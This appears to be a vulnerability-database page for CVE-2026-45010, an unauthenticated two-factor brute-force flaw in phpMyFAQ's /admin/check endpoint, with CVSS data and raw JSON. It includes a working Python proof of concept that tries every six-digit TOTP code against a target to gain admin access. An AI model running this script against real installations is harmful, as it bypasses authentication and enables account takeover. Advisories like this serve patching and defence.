Security Vulnerability Report
中文
CVE-2026-45010 CVSS 9.1 CRITICAL

CVE-2026-45010

Published: 2026-05-15 19:17:01
Last Modified: 2026-05-15 23:16:21
Source: [email protected]

Description

phpMyFAQ before 4.1.2 contains an improper restriction of excessive authentication attempts vulnerability in the /admin/check endpoint, which accepts arbitrary user-id parameters without session binding or rate limiting. Unauthenticated attackers can brute-force any user's six-digit TOTP code by submitting POST requests with sequential token values, bypassing two-factor authentication to gain full administrative access.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target-site/admin/check" user_id = "1" headers = { "User-Agent": "PoC-Scanner/1.0", "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Starting brute force for user {user_id}...") # Iterate through all 6-digit combinations for code in range(1000000): totp_code = f"{code:06d}" data = { "userid": user_id, "totp": totp_code } try: # Send POST request to the vulnerable endpoint response = requests.post(target_url, data=data, headers=headers, timeout=2) # Check response for indicators of success (e.g., 200 OK with specific text or redirect) # Adjust condition based on actual application response if response.status_code == 200 and "success" in response.text.lower(): print(f"[+] Valid TOTP code found: {totp_code}") print(f"[+] Admin access granted!") break elif response.status_code == 302: print(f"[+] Potential success with 302 Redirect using code: {totp_code}") break except requests.exceptions.RequestException: pass if code % 10000 == 0: print(f"[*] Progress: {code} codes tested.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45010", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:01.450", "lastModified": "2026-05-15T23:16:20.927", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ before 4.1.2 contains an improper restriction of excessive authentication attempts vulnerability in the /admin/check endpoint, which accepts arbitrary user-id parameters without session binding or rate limiting. Unauthenticated attackers can brute-force any user's six-digit TOTP code by submitting POST requests with sequential token values, bypassing two-factor authentication to gain full administrative access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-two-factor-authentication-brute-force-via-admin-check-endpoint", "source": "[email protected]"}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.